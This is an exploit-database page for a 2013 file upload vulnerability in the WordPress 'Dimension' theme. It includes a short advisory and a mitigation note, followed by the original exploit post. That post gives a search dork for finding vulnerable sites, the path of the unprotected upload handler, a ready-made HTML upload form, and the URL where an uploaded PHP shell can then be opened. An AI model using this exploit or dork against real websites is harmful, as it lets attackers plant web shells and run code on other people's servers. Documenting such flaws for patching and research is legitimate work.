header-logo
Suggest Exploit
vendor:
Wordpress Dimension Themes
by:
DevilScreaM
7,5
CVSS
HIGH
CSRF
352
CWE
Product Name: Wordpress Dimension Themes
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mozila, Chrome, Opera -> Windows & Linux
2013

WordPress Dimension Themes CSRF File Upload Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability exists in the Wordpress Dimension Themes. An attacker can exploit this vulnerability to upload arbitrary PHP code and execute it in the context of the webserver process. The vulnerability is due to insufficient validation of the uploaded file type. An attacker can send a malicious POST request to the upload-handler.php script in the library/includes directory to upload a malicious PHP file. The uploaded file can then be accessed directly from the uploads directory.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the Wordpress Dimension Themes.
Source

Exploit-DB raw data:

#Title : Wordpress Dimension Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Date : 11/17/2013 - 17 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
     Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

#Dork : 

inurl:wp-content/themes/dimension


CSRF File Upload Vulnerability

Exploit & POC : 

http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

Navigation

Suggest Exploit

Services By CQR